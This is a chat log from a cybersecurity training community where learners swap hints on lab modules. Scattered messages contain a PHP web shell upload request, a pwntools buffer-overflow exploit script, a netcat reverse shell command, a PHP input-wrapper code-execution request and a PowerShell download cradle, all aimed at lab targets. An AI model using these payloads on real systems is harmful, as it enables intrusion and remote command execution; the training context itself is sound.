#modules

1 messages · Page 27 of 1

rustic sage
#

yay finally

thorn urchin
#

I know on the assessment I had s few parts where I needed to test some 7k combinations (that ultimately didnt work) and that woulda been ages in intruder

vital adder
#

also the pls remove the flag name that's a bit too much spoiler (if the flag named flag then i would say it's fine)

thorn urchin
#

I can only imagine sitting there the whole time in intruder just to confirm it was the wrong path

pastel ginkgo
#

how do yall feel about zap? it seems kinda meh just by how the module is just like "its a thing"

thorn urchin
#

The venn diagram of web app pentesters, burp users, and zap users are two circles barely touching each other with zap being alone

pastel ginkgo
#

So no one uses zap?

thorn urchin
#

basically

pastel ginkgo
#

its open office then

#

at least until recently now that France made it all schools cannot use Microsoft Office lol

thorn urchin
#

its actually more feature complete than burp, but it's UI and workflow is so horrendous its like pulling teeth

pastel ginkgo
#

i mean vim and enums are pulling teeth and people swear by them

thorn urchin
#

and anything zap can do that burp cant(or needs to be paid) can be supplemented by ffuf and other similar tools

#

thats cause those ones only pull teeth while youre learning them. zap always pulls your teeth always

pastel ginkgo
#

I cant even find a easy download for it on linux

thorn urchin
#

if the zap team got like a modern UI/UX guy to come in and redo the whole interface from scratch, I bet people would be swapping over to it overnight

vital adder
#

oh wait isn't zap open source? if that's the case i think someone should already did something like that but it just not official

vital adder
vital adder
thorn urchin
#

it is open source and if someone actually did make a fork with a slicker UI they need to advertise it better lol

pastel ginkgo
#

same I use vim as well but I have not gone further than a text editor for it

#

I genuinely cant even get zap to download off their own site.

#

I want to finish this module in a day

rough tinsel
#

Thanks

pastel ginkgo
#

I haven't finished an entire module in a day since the very beginning lol

vital adder
#

same can't stop procrastinating

thorn urchin
#

some of the web sections are definitely a breather compared to the AD Module

pastel ginkgo
#

fail it wouldnt download because I had burpsuite running

vital adder
brazen dust
#

Is there anyone on that can help with Cross-Site Scripting(XSS) - Session Hijacking?

pastel ginkgo
#

@thorn urchin @vital adder For the assessment of Web Proxies how many times did you have to click the button? I've sent it it via repeater like 100 times now.

thorn urchin
#

it was a lot

#

idr exactly

vital adder
#

i do remember having some issue with sending that in repeater but i would way it took me under 15 try (manually)

west canopy
pastel ginkgo
#

lmao

#

my eyes are burning from staring at this white text

vital adder
#

use dark mode

sly tapir
#

haha

pastel ginkgo
#

idk how to make burpsuite change to dark mode

#

and ive hit the button more than 15 times now

vital adder
#

this isn't dark mode but say this doesn't look good (random screenshot)

sussy_upload_payload.png
sly tapir
pastel ginkgo
#

God bless you my eyes are saved

sly tapir
vital adder
#

i forgot the name give me a sec let me open my burp

pastel ginkgo
#

@west canopy I do not feel lucky anymore like this thing says. This assessment fails to account for those with shit luck. lol

vital adder
thorn urchin
pastel ginkgo
#

Idk how to make fluff do that lol

thorn urchin
#

itd be kinda annoying ngl

pastel ginkgo
#

|| All I needed to do was removed the disabled portion from the html right?? ||

thorn urchin
#

thats one way

#

I think I just sent it to repeater

pastel ginkgo
#

I feel like im doing somthing wrong at this point

#

I did

#

I keep getting the same response back to click the button

#

jesus what are the odds on this .01% I feel like im grinding in WoW again

#

I fixed it

image.png
vital adder
#

i just give it a try and it tool me 31 time

pastel ginkgo
#

Yeah its bugged

#

Ive hit it in the 300+ region now

vital adder
#

i just spam the new request in firefox and after a bit i got the flag

vital adder
low vine
#

okay going back and finishing up last bits of FFUF module I'm working on Parameter Fuzzing - GET

I've got what should be the correct syntax and I cannot for the life of me understand why its not running going
||ffuf -w /usr/share/payloads/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.academy.htb:32129/admin/admin.php?FUZZ=key||

I've added admin.academy.htb to /etc/hosts file and when running this I get the error
zsh: no matches found: http://admin.academy.htb:32129/admin/admin.php?FUZZ=key

From my understanding this syntax should give me what I'm after but I cannot for the life of me understand why I only get this error.

pastel ginkgo
#

does the flag just show on the page?

vital adder
#

yep

#

i just make a bash loop that basically send the request 100 time and i only got 3 flag

vital adder
pastel ginkgo
#

Am I repeating the wrong request?

SPOILER_image.png
vital adder
vital adder
pastel ginkgo
#

jesus im glad I didnt buy a lottery ticket today I have zero luck

vital adder
#

i got 3 flag out of 100 try so your chance is kinda low for this

pastel ginkgo
#

idk how to even send the code to intuder

#

I did the 2nd one in 5 secs because I got bored of clicking send

#

as ive been at it now for 20 mins

#

clearly something isnt working right

vital adder
#

try restart the target or use a auto clicker in burp repeater nvm you would miss the flag

pastel ginkgo
#

did the first and the 2nd would mean I wouldnt see it lol

#

I reset the machine and burpsuit at this point

vital adder
#

dm me your target let me try it with my bash loop to see if it even possible to get the flag

low vine
#

what the fuck

rustic sage
#

brute force labs are actually the worst🫠

vital adder
#

i never got that issue in the zsh shell

low vine
#

that took me more hours

#

than i care to admit

#

I questioned my sanity

#

twice

#

HTB OVERLORDS WHY ARE YOU TESTING MY SANITY TODAY!

#

Ty, but fuck you ❤️ me

stiff helm
#

hello i am sitting on the htb academy web request module at the http Headers Part there i should use the web devtools to see some request to a flag, could solve the rest, but that one i cant solve, started bruteforcing solutions in my eyes there is no request to a file they say if there is no reqeust to a flag i should reload the page, you dont know how often i reloaded that page now.., meanwhile i looked into the the hint but still no clue what i should do.. is there somebody who can give me a hint? 🙂

forest tapir
#

iirc it's hidden somewhere in the response.

#

don't put money on it, but i feel like I remember that one.

#

or in a cookie... now i'm doubting myself lol

stiff helm
#

thanks for your response, still no clue, but maybe its buggy looked up some other walkthrows concerning this module and it seems to be that this one part got updated.. everything else is the same. maybe another day and then it just works.

#

omg i finally found it you where absolutly right with hijnt concerning the response my screen is a bit small so havent seen that on on the right side is a Response button. thx a lot @forest tapir my hero of the day 🙂

forest tapir
#

Not sure why but it's not seeing my ticket as 'valid'.

kerberos.png
#

Password Attacks - PtT From Linux

wheat garden
forest tapir
#

Found the service acc.'s keytab file. Got a TGT, or so I thought...

wheat garden
forest tapir
#

I'll DM you, if you don't mind.

#

Don't wish to spoil

wheat garden
#

ok

worn forge
#

Hey! I need help with Password Attacks Lab - Hard, I could download the vhd file, and im trying to crack it but it takes a lot, I got a pw, but it doesn't work when im trying to open the mount partition

gentle meteor
#

help me with starting point preignition

#

TASK 6

When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages?

#

@distant oar

#

help a noob out

red obsidianBOT
#

There is no need to use a VPN to connect for any of the CA Challenges, they are all accessible via the public IP's given when started. Not all challenges have an HTTP server however, some you need to connect via nc.

kind turret
worn forge
#

I used rockyou and the mutation password list

kind turret
#

mut_password.list should be enough. Using John right?

worn forge
#

yes, but it takes a lot, i got a 123... pw but it doesn't work

gentle meteor
#

heelp

worn forge
#

idk what im missing

kind turret
#

DM me

worn forge
#

ok thx

gentle meteor
#

👍

worn forge
#

dm me mofo

gentle meteor
#

ok

#

yh pls help

#

@worn forge

rich vale
#

i swear, the AD module is killing me, feels like Im fighting more with the lab itself and not the actual targets/content

kind turret
#

Why is that

rich vale
#

getting an invalid password when trying to connect to the Windows attack machine

kind turret
#

Share a screenshot if you may

rich vale
#

not sure if im doing something wrong? but seems like im stuck before even doing the lab work lol

kind turret
#

Use xfreerdp and see maybe?

rich vale
#

ah wow, that actually worked

#

the splash warning is just a black screen when i use xfreerdp, but pressing enter moved passed it and logged me in

#

so does rdesktop do anything different? seems like a really specific issue

kind turret
#

try quoting the username htb-student, it might be that

rich vale
#

nope, didn't work but good guess at least. oh well, at least now i can do the lab

#

thanks for that!

winged roost
#

hey all was wondering if someone could help me. on the active directory - kerberoasting from Windows section - regarding MIMIKATZ. for the life of me unless im going bananas, cannot seem to find the exe file

#

cannot get into the x64 directory, where normally the .exe file is. commands such as mimikatz.exe doesnt work as it doesnt exist according to PS

kind turret
#

Question 1 or 2 @winged roost ?

#

But, neither of them do actually require mimikatz though

winged roost
kind turret
#

Rubeus?

winged roost
#

thanks, i was having issue with the format from powerview for offline cracking.

rustic sage
#

yo

untold crag
rustic sage
#

sup chat

static glacier
fathom mortar
#

Hey guys. i need help at Password Attack Module at protected files section.
Im doing hydra for user kira on ftp service but it takes sooooo long.
Could anyone help me ? DM please

#

? 😦

silver zenith
#

Maybe it uses other creds thensadglas

#

Unictf over back to academy

mystic furnace
#

Hey guys! Is there anybody kindly for a short nudge with FootPrinting Module hard lab? Better DM not to spoil here. Thanks.

rustic sage
#

Hello im stuck at the same place how did you that?

sage granite
#

Ok, I have no idea how to solve blacklist filters in the module file upload attacks.

req.txt copied from burp:

POST /upload.php HTTP/1.1
Host: 206.189.116.117:32324
Content-Length: 150
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybldlPLZlzD83jTj9
Origin: http://206.189.116.117:32324
Referer: http://206.189.116.117:32324/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarybldlPLZlzD83jTj9
Content-Disposition: form-data; name="uploadFile"; filename="shellFUZZ"
Content-Type: image/png

<?php system($_REQUEST['cmd']); ?>

------WebKitFormBoundarybldlPLZlzD83jTj9--

Uploading:

ffuf -request req.txt -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -c -debug-log d.txt --request-proto http

Checking for execution:

ffuf -u "http://206.189.116.117:32324/profile_images/shellFUZZ?cmd=ls" -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -c --request-proto http

results:
all lines sized 35, nothing stands out, I have even added the same capsed extensions to that file with extensions and still nothing -.-

thorn urchin
#

need to use a better wordlist

#

the web-extensions one is okay for lightly enumerating some extensions, but not really for bypassing blacklists

rustic sage
#

stuck

unique valve
rustic sage
#

base number?

unique valve
#

In other words just the first number in that version listed 🙂

#

As stated in the challenge question. Windows X. Hint hint

rustic sage
#

Thanks!

unique valve
#

Anytime!

sterile thistle
#

Can someone also help me ?

#

How to fix “context is not define” in a “from pwn import *” python script?

sage granite
potent ermine
#

Hey guys I'm on the Bind shells lesson. I connected via ssh to the target and set up the listener, and entered the line to generate the shell. However, on the attack side, I only see the text output. Did I miss anything?

image.png
sterile thistle
# 

#!/usr/bin/env python

from pwn import *

context(os="linux", arch="amd64")

binsh = "/bin/sh\x00"
junk = "A"*(120 - len(binsh))
plt_system = p64(0x401040)
test = p64(0x401152)
pop_r13_r14_r15 = p64(0x401206)

payload = junk + binsh + pop_r13_r14_r15 + plt_system + p64(0) + p64(0) + test

p = remote("10.10.10.147", 1337)
p.recvline()
p.sendline(payload)
p.interactive()
#

Traceback (most recent call last):
File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/./pwn.py", line 3, in <module>
from pwn import *
File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py", line 5, in <module>
context(os="linux", arch="amd64")
NameError: name 'context' is not defined

thorn urchin
#

looks like context doesnt exist in pwn

#

also if youre posting code to discord wrap it in triple backticks plus the language and youll get nicely formatted code blocks with syntax highlighting. End the block with another set of triple backticks.

from pwn import *
print ("Much better")
sterile thistle
placid quest
#

@thorn urchin hei have u done skills assessment on pivoting because i need a hint if u are free u can dm me

sterile thistle
sage granite
sterile thistle
# 
pwn==1.0
pwncat==0.1.2
pwncat-cs==0.5.4
pwnlib==1.2.1
pwntools==4.8.0
#

this is the version im using

sage granite
#

Ah, this pwn module is overshadowing your pwntools

sterile thistle
#

how do i fix it?

sage granite
#

pip uninstall pwn

sterile thistle
sage granite
#

Do not reinstall

#

Just uninstall

sterile thistle
# 


WARNING: Skipping pwn as it is not installed.
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv```
# 
Traceback (most recent call last):
  File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py", line 3, in <module>
    from pwn import *
  File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py", line 5, in <module>
    context(os="linux", arch="amd64")
NameError: name 'context' is not defined
#

no...

sage granite
#

try python -c 'import pwn;print(pwn.__file__)'

#

I think the problem is that your pwn points to wrong module, still

sterile thistle
# 

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py", line 5, in <module>
    context(os="linux", arch="amd64")
NameError: name 'context' is not defined
#

this is odd

sage granite
#

dude

#

do you have a pwn script in your working directory?

#

like pwn.py ?

#

/root/Desktop/tools/exploit/Buffer_overflow/NX_enabled/pwn.py'
^

sterile thistle
sage granite
#

Cause it says you are importing it from your own folder I guess

sterile thistle
#

yes

sage granite
#

So it won't work

#

Because when you say to python import filename it will try to import shit FROM that file

sterile thistle
# 

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python3.10/dist-packages/pwn/__init__.py", line 19, in <module>
    pwnlib.update.check_automatically()
AttributeError: module 'pwnlib' has no attribute 'update'```
#

i removed the pwn.py

#

and this new error happens

sage granite
#

again, you have some old deprecated and useless modules installed

#

pip uninstall pwnlib

#

on my pc I have just pwntools==4.8.0 when I do
$ pip freeze | grep pwn

sterile thistle
# 
pwncat==0.1.2
pwncat-cs==0.5.4
pwntools==4.8.0
sage granite
#

Del this pwncat too

#

I have no idea what this shit is but it is not a part of pwntools currently

sterile thistle
# 

Found existing installation: pwncat 0.1.2
Not uninstalling pwncat at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'pwncat'. No files were found to uninstall.
#

lol

sage granite
#

Okay, it may work now

#

Also, don't run all basic python stuff as root

#

It will give you a burning pileshit of errors

sterile thistle
# 

Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python3.10/dist-packages/pwn/__init__.py", line 19, in <module>
    pwnlib.update.check_automatically()
AttributeError: module 'pwnlib' has no attribute 'update'```
sage granite
#

Hmm check python -m pip freeze | grep pwn

sterile thistle
# 
pwncat==0.1.2
pwntools==4.8.0
#

cant delete this weird pwncat

#

*uninstall

# 
Found existing installation: pwncat 0.1.2
Not uninstalling pwncat at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'pwncat'. No files were found to uninstall.```
sage granite
#

Yeah cuz its installed globally, try sudo it

#

You did a pretty nice mess there 🙂

sterile thistle
sterile thistle
#

imma just give up this box...

#

@sage granite thank you very much for your help

sage granite
#

I think your pc is kinda messed up a bit with these old pwnlibs

sterile thistle
#

i love you❤️

solar granite
#

@sterile thistle your modules are definitely messed up. I would just reinstall them all if you really need pwntools often. Otherwise, just use a venv whenever you need pwntools

steep loom
#

Can anyone that had completed the Skills assessment for the file upload please give me a hint. I desperately fail to understand the bypassing of the whitelisting with mime typing and would like some help. I have the source code, so I know what/how to bypass the filters but When I do It fails to executes the PHP code. I think becuse it is looking for image data and im passing php after the magic byte? Like I said, any help would be super appricated, beating my head against the wall at this point

solar granite
solid quarry
#

Module: Introduction to Windows Command Line
Section: User and Group Management (powershell)
Question: Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?

Issue: Everytime I try the command: Get-ADUser -Filter *, but It gives me this error:

Get-ADUser : The server has rejected the client credentials.

Already tried to create a $cred objet "Kerberos double hop thing" without success

steep loom
latent sage
#

hello @everyone please needed help on the login brute force module precisely the service authentication section

rustic sage
#

Hmm?

#

What's up

latent sage
#

what i have tried is to brute force the ssh service with the rockyou-5 ,10 ,15, 20 word list

#

and with the rockyou.txt file but did not finish the process since the server times out

rustic sage
#

The service or a user?

latent sage
#

since the user is given as "b.gates"

rustic sage
#

Right so- if it isn't a common password

latent sage
#

so i am brute forcing only the password

rustic sage
#

What else could we do to make it more personal?

latent sage
#

using maybe cupp

rustic sage
#

Give it a try and experiment !

latent sage
#

but there are no extra info

rustic sage
#

Bill gates?

#

Give him a search online

latent sage
#

a part from the username

rustic sage
#

So for the CUPP, you'll have to dig a bit further yourself

#

If you're using something else, it's the same

latent sage
rustic sage
#

Have you started CUPP

latent sage
#

doing so

rustic sage
#

Just give it a read

latent sage
#

had a wordlist given it a try

rustic sage
#

Can anyone help on the

Brute Forcing - Skill Assessment - Website

I'm a little confused if it is telling me to use ||b.gates|| again or start from scratch, could someone just clear this up for me? ^^;

latent sage
rustic sage
#

It's not very clear to me aha-

I've even ran like a few different brute forces with default names and passwords but nopeeee.

#

Oh my God I found the pw

latent sage
rustic sage
#

Hello, good day.
I'm currently taking the Learning Process module and I don't quite understand a part of the The Process section, sub-section Questioning.

I need clarity on this.

Context: We are in objection to the official definition of what a question is - A question is a sentence worded or expressed to elicit (draw, obtain) information.

The part I don't understand:
"Next, the definition of a question explains its purpose. Therefore, according to the definition, the purpose is to obtain or acquire information.
Let us, therefore, create a situation with a question to test this statement. Let us assume we see host A and host B. To do this, we can ask the following question, which we will also ask during our penetration tests:

How is Host A connected to Host B?
Our goal was to obtain or acquire information with the help of the question posed. Did we obtain or acquire any information from this question? - No."

I can say the information I have obtained from that question is vague, not necessarily no information but something more like what was described earlier as a rough question.

I may be missing something vital in this lesson please help.

rustic sage
#

From the bottom, go upwards.

rustic sage
latent sage
rustic sage
#

Nono trust me

latent sage
solar granite
rustic sage
#

Could I DM someone about Password Attacks Pass the Hash (PtH) under Windows Lateral Movement?

rustic sage
# solar granite I'm not sure I understand what you need help with

Thanks for your response.
"How is Host A connected to Host B?
Our goal was to obtain or acquire information with the help of the question posed. Did we obtain or acquire any information from this question? - No."

I'm in opposition to this view.

It says we have not obtained any information from the question but I believe there's information even though it's not relevant, more like the state "rough question" mentioned earlier. Can you review and tell where I need clarity?

vital adder
waxen barn
#

Attacking Common Services - Easy Skills Assessment. I’ve gotten access to the FTP server and MySQL. I uploaded a web shell where I can do ?cmd= in the URL. The only command that are working are whoami and dir. How do I get the reverse shell?

raven cairn
#

So on this section and module I have been able to successfully perform the Attack, but I am not sure about the way to get Bross's NTLM hash

#

Would appreciate some help

pastel ginkgo
#

I ended up solving that one by using the hash from the raise child.py

#

I recommend taking heavy notes of that module to get past the skills assessment

#

im re writing my notes for it right now. The assessments for that module are a beast!

waxen barn
pastel ginkgo
#

try the base 64 one that tends to work the best for me

waxen barn
#

Ugh, I tried that one for CMD. Didn’t work. You put it following the “cmd=“, correct?

pastel ginkgo
#

what type of encoding should you use if your pasting a shell into a url?

#

if your using something like burpsuite it will often encode the payload for you if you set it up or you can use rev shells encoder or google an encoder.

waxen barn
#

I tried URL encoding as well

pastel ginkgo
#

try /?c=

rough thunder
#

Hi can anyone help with Linux Priv Esc?

thorn urchin
waxen barn
# pastel ginkgo try ``/?c=``

yep. shell.php?c=ncat.exe 10.10.16.23 4443 -e cmd. I try and URL encode it and base64. I also tried URL encoding it in Burp. Nothing.

thorn urchin
#

honestly I wouldn't bother with s reverse shell, Id just grab what I need and get out

pastel ginkgo
#

For that one I had to use a rev shell as well

thorn urchin
#

or you could just rewrite your uploaded shell to already be a php reverse shell

pastel ginkgo
#

Btw @thorn urchin did I tell you I could get powerview to work with IEX(New-Object Net.WebClient).downloadString('http://10.10.x.x:8080/PowerView.ps1')

thorn urchin
#

nice

pastel ginkgo
#

saw it in ippsec video and it worked for me

#

idk why putting it on the target host then importing the module didnt work

thorn urchin
#

¯_(ツ)_/¯

#

in all fairness in real life the IEX method is better anyways cause youre not writing to disk

waxen barn
waxen barn
thorn urchin
#

it definitely isnt 😉

pastel ginkgo
#

lol no that goes to Web Proxies

thorn urchin
#

but the rankings on the labs are all wack

pastel ginkgo
#

I clicked a button 300 times yesterday just to get a flag

thorn urchin
#

easy is definitely the hardest of the three

#

Easy>Hard>Medium

#

its weird

#

I say most annoying is Password Attacks

#

you just got extremely unlucky in web proxies

pastel ginkgo
#

oh yeah password attacks is a bitch in a half but I feel like I learned something

rustic sage
#

I'm on Password Attacks right now and I'm glad y'all agree😅 I think this one should be listed as 2 days not 8 hours.

thorn urchin
#

2 days not cause its hard, it just wastes your time

rustic sage
#

yeah I don't think it's to challenging so far it's just a lot of time

thorn urchin
#

it needs a complete passthrough and the correct passwords tweaked to cut down on time spent

rustic sage
#

especially cracking them hashes, mutating password lists, using hydra with the mutated passwords

thorn urchin
#

no legit crack should take longer than 5 minutes from the pwnbox, but you have some instances where it will be 20-30minutes if youre correct if youve messed up good luck you wont know till the box has to be reset

rustic sage
#

I mean it an important skill to learn and patience is obviously needed to, but I feel like I can't move on until I finish so I'm far behind now lol

#

I'm still on Pass the Hash attacks

waxen barn
waxen barn
#

Thanks to both @thorn urchin and @pastel ginkgo for the tips

tidal mango
#

Anyone around who might be able to answer a couple questions on the Active Directory skill assessment (part 1)?

tidal mango
gentle meteor
#

TASK 6

When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages?

#

Help!!!

#

-# ###

#

Is the text

brisk geode
gentle meteor
#

Idk where to look

#

Do you have the answer

brisk geode
gentle meteor
#

what does man do?

brisk geode
gentle meteor
#

I look it up

#

But there wasn’t a word to activate php?

#

Pages

brisk geode
#

here u go

gentle meteor
#

Thx bro!

#

I’ll have to go through everything

brisk geode
#

but i would say

brisk geode
tidal mango
# gentle meteor Thx bro!

if yo need to know what a flag does you can usually do something like "gobuster dir --help" it will give you some more options on the dir part. "gobuster dir -x php" is probably what your after. its helpful to learn to use the help and or man pages however

tidal mango
brisk geode
tidal mango
cunning obsidian
#

j

sly grotto
#

can someone help me in Password Attacks?

loud sapphire
#

which bit

latent sage
rustic sage
#

hihi

#

Still having problems?

latent sage
#

didn't succeed try the hole night without success can i DM you

rustic sage
#

Sure

short arrow
#

hi

rustic sage
#

Heyo

#

Need some help with Brute Forcing Module -> Website Skill Assessment

Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?

Do I use the username I just found on the question previous or do I use another? wording is a little confusing.

shy pilot
#

Recently I started doing HTB academy

#

While doing the local file inclusion module, I am getting errors and the questions also they are asking in depth but they explained basic minimal level of theory part.

#

Does anyone completed file inclusion module, kindly let me know, I have some doubts regarding about that.

turbid kraken
#

Hey guys, I'm trying to wrap my head around some errors/lack of details in the OpenVAS part of the Vulnerability Assessment module.
In the OpenVAS Skills Assessment, I am unable to reach the OpenVAS interface located on <targetIP>:8080

Additionaly, I tried putting openVas on my kali machine, but here is the result of my gvm-check-setup:

# 
  Test completeness and readiness of GVM-22.4.0
Step 1: Checking OpenVAS (Scanner)... 
        OK: OpenVAS Scanner is present in version 22.4.0.
        OK: Notus Scanner is present in version 22.4.1.
        OK: Server CA Certificate is present as /var/lib/gvm/CA/servercert.pem.
Checking permissions of /var/lib/openvas/gnupg/*
        OK: _gvm owns all files in /var/lib/openvas/gnupg
        OK: redis-server is present.
        OK: scanner (db_address setting) is configured properly using the redis-server socket: /var/run/redis-openvas/redis-server.sock
<...snip...>
Checking that the obsolete redis database has been removed
        OK: No old Redis DB
        OK: ospd-OpenVAS is present in version 22.4.0.
Step 2: Checking GVMD Manager ... 
        OK: GVM Manager (gvmd) is present in version 22.4.0~dev1.
Step 3: Checking Certificates ... 
        OK: GVM client certificate is valid and present as /var/lib/gvm/CA/clientcert.pem.
        OK: Your GVM certificate infrastructure passed validation.
Step 4: Checking data ... 
        OK: SCAP data found in /var/lib/gvm/scap-data.
        OK: CERT data found in /var/lib/gvm/cert-data.
Step 5: Checking Postgresql DB and user ... 
        OK: Postgresql version and default port are OK.
 gvmd      | _gvm     | UTF8     | en_US.UTF-8 | en_US.UTF-8 |            | libc            | 
        ERROR: The new extension pgcrypto does not exist for gvmd database
        FIX: Run 'sudo runuser -u postgres -- /usr/share/gvm/create-postgresql-database'

 ERROR: Your GVM-22.4.0 installation is not yet complete!

Please follow the instructions marked with FIX above and run this
script again.
#

results of sudo runuser -u postgres -- /usr/share/gvm/create-postgresql-database:

# 
[i] Database gvmd already exists in PostgreSQL
[i] Role DBA already exists in PostgreSQL

[*] Applying permissions
NOTICE:  role "_gvm" is already a member of role "dba"
GRANT ROLE
[i] Extension uuid-ossp already exists for gvmd database
[i] Extension pgcrypto already exists for gvmd database
[i] Remove old parts from DB for new pg-gvm extension
NOTICE:  view "result_new_severities_dynamic" does not exist, skipping
NOTICE:  view "result_new_severities" does not exist, skipping
NOTICE:  view "result_new_severities_static" does not exist, skipping
NOTICE:  view "result_overrides" does not exist, skipping
NOTICE:  function hosts_contains() does not exist, skipping
NOTICE:  function max_hosts() does not exist, skipping
NOTICE:  function regexp() does not exist, skipping

[*] Creating extension pg-gvm
ERROR:  extension "pg-gvm" has no installation script nor update path for version "22.4.0"
#

Thanks for any help!

rustic sage
turbid kraken
#

@rustic sage can I dm?

rustic sage
#

Of course

rustic sage
spring sigil
#

Is there any way to use these permissions to your advantage for privilege escalation in the final section of the Getting Started module?

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php

I'm kind of lost at the moment

loud sapphire
#

dm me if needed

spring sigil
#

First thing I checked, not the case though

rustic sage
#

I don't think this is really a spoiler, but there is an amazing resource for Linux privilege escalation, file upload and download, and more. If you can't find it or need help understanding it feel free to dm me @spring sigil

loud sapphire
#

as sudo by the way

rustic sage
rustic sage
spring sigil
#

I couldn't figure out what to do with the commands. I got it now, thank you to both of you:D

loud sapphire
broken warren
#

How do I remove junk from the same line in a .txt. file? Specifically Im trying to do the predictable reset token section in the brkn authentication module. I soun up the php example I ran the python code they have and I got a bunch of "checking blah blah" and then a token. I have no idea what I'm doing so Im just trying to strip the "checking" away so I have just tokens but everytime I do grep -v " checking blah blah" it either does nothing or hides everything.

broken warren
tawdry glade
#

Module: FILE INCLUSION htb academy
•Remote Code Execution

  • PHP wrappers

I can’t capture the output string with the command:
curl “http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/X.Y/apache2/php.ini”

My allow_url_include is activate
My PHP Version is 8.1

What’s wrong?!

solar granite
loud sapphire
thorn ingot
#

Question about HTB machines

Will all machines expect me to know how to privsec (for example) beforehand or is there some ones that teach me how to do it?

thorn ingot
loud sapphire
thorn ingot
iron plaza
#

Hey guys need a bit of help here:
I am currently doing the Intro to Windows Command Line and one of the question is: "Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname? "

my answer as per the hint is "Get-ADUser -Filter*" but I get this message in return "Get-ADUser : The server has rejected the client credentials"

What am I doing wrong?

loud sapphire
tawdry glade
thorn ingot
loud sapphire
loud sapphire
hollow hinge
tawdry glade
hollow hinge
loud sapphire
hollow hinge
rustic sage
#

You'll have to find your own way manually

tawdry glade
# hollow hinge Just `ls` and find flag file and `cat /flagfile.txt`

No i can't..
When i write in the terminal:
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
the result is:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

But then i don't have a web shell to cat flag.txt

rustic sage
#

Use cd (directory name) to go into a place

tawdry glade
loud sapphire
#

overthinking. dont do that.

loud sapphire
rustic sage
#

I mean you can CD it just won't do anything, unless you execute multiple commands

loud sapphire
#

lol

solar granite
rustic sage
#

Anyone available for PtT computer impersonation? (Password Attacks module)?

loud sapphire
rustic sage
#

Linux

loud sapphire
#

which question?

rustic sage
#

PtT computer impersonation lol

loud sapphire
#

dm me and I will help you go through it all.

red obsidianBOT
#

There is no flag here. Get back to hacking!

rustic sage
rustic sage
#

u

raven cairn
#

Feel stupid lol

coarse birch
#

pls who can send me a link for a hacking app

thorn urchin
feral stump
#

Nobody

thorn urchin
autumn pilot
#

@coarse birch don't spam the channels

raven cairn
thorn urchin
#

wouldnt hurt to try

raven cairn
raven cairn
thorn urchin
#

rough

raven cairn
#

I've been stuck on this question for soooo long and I know i am missing something super simple 😅

placid quest
#

@raven cairn To transfer the file use Invoke-WebRequest u will need to start python3 web server

thorn urchin
coarse birch
#

k

#

It is okay guys

#

I will find it

raven cairn
#

Can I have someone DM me? I am so close to finishing this module but I am stuck on this section even tho it should be really easy.

#

Attacking Domain Trusts - Child -> Parent Trusts - from Linux

coarse birch
#

pls I need an app to hack send link

thorn urchin
coarse birch
#

k

#

forget about what I text

#

kk

placid quest
#

@raven cairn use it with powershell

vital adder
# coarse birch pls I need an app to hack send link

here is the link you'll need https://www.youtube.com/watch?v=OLpeX4RRo28

YouTube
TVFilthyFrank
PINK GUY - STFU

dedicated to everyone i know. leave me alone.
co-prod. @ryan_jacob
NEW SHIRTS: http://filthytokyo.com/

TWITTER: https://twitter.com/FilthyFrank
FACEBOOK: https://www.facebook.com/TheFilthyFrank
SHIRTS: http://filthyfrank.spreadshirt.com/
INSTAGRAM: http://instagram.com/papafranku
MUSIC: http://pinkguy.bandcamp.com/
MUSIC: https://soundcloud.com...

▶ Play video
warm kernel
#

anyone here able to give me some clues for the MSSQL question on academy?

vital adder
#

which module and section?

warm kernel
#

Footprinting

#

any standard sql command isn't giving me an output, not even errors

vital adder
#

under the ||Connecting with Mssqlclient.py|| part they did show you some syntax to list databases in myssql

#

and no you can't use syntax from mysql for this

thorn urchin
#

thats also not valid mysql syntax either

warm kernel
#

yeah I tested standard mysql syntax after trying what is showed on the mssqlclient.py example

#

yup, bad example, I had tried them beforehand

#

worth a restart then?

thorn urchin
#

should show a screenshot with your attempted commands using mssql syntax

raven cairn
thorn urchin
#

you might be missing something simple that can be spotted

raven cairn
#

The sql module can be helpful for sql querieies

thorn urchin
vital adder
raven cairn
#

He’s always so nice so it is suprising when he gets angry

#

🤣

warm kernel
thorn urchin
#

no ;

warm kernel
#

no change

#

hence the confusion

thorn urchin
#

select name from master.dbo.sysdatabases;

warm kernel
#

the example doesn't have any either

image.png
vital adder
#

you need to use go to run the command but in the example they didn't use go so that's kinda weird but try go after each command

thorn urchin
#

hmm odd, yeah try resetting I suppose

#

yeah thats worth a try too

warm kernel
vital adder
#

so

SQL> go (to run the command you just type)```
warm kernel
#

ah

thorn urchin
#

yeah worth a shot. My client hasnt needed that, but maybe were using different ones

warm kernel
#

